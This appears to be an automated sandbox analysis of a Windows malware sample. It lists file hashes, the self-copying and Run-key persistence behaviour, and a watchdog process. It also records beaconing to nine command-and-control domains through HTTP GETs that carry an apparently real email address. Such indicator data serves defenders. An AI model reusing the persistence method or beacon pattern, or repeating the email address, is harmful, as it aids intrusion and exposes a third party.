Field | Value |
---|---|
Analysis Date | 2015-01-16 22:51:55 |
MD5 | d080f15eb2d4df1a86f03a103b3c7f95 |
SHA1 | e38b2e5e8ea3b299d0d964b640a820ade8bc5e8e |
Static Details:
Runtime Details:
Process
↳ C:\malware.exe
Action | Detail |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Networking AuthIP Files ➝ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe
Action | Detail |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\xysrdyvxaavi.exe |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.rhaui |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe"
Network Details:
Event | Detail |
---|---|
DNS | smokeinside.net Type: A 50.63.202.34 |
DNS | partybright.net Type: A 184.168.221.24 |
DNS | freshpeople.net Type: A 91.206.201.140 |
DNS | summerready.net Type: A 72.167.191.69 |
DNS | summerpeople.net Type: A 65.254.248.141 |
DNS | waterready.net Type: A 64.74.223.38 |
DNS | waterpeople.net Type: A 66.151.181.49 |
DNS | partyready.net Type: A 8.5.1.51 |
DNS | partypeople.net Type: A 217.138.13.211 |
HTTP GET | http://smokeinside.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partybright.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://freshpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://summerready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://summerpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://waterready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://waterpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partyready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
HTTP GET | http://partypeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 50.63.202.34:80 |
Flows TCP | 192.168.1.1:1032 ➝ 184.168.221.24:80 |
Flows TCP | 192.168.1.1:1033 ➝ 91.206.201.140:80 |
Flows TCP | 192.168.1.1:1034 ➝ 72.167.191.69:80 |
Flows TCP | 192.168.1.1:1035 ➝ 65.254.248.141:80 |
Flows TCP | 192.168.1.1:1036 ➝ 64.74.223.38:80 |
Flows TCP | 192.168.1.1:1037 ➝ 66.151.181.49:80 |
Flows TCP | 192.168.1.1:1038 ➝ 8.5.1.51:80 |
Flows TCP | 192.168.1.1:1039 ➝ 217.138.13.211:80 |
Raw Pcap
Strings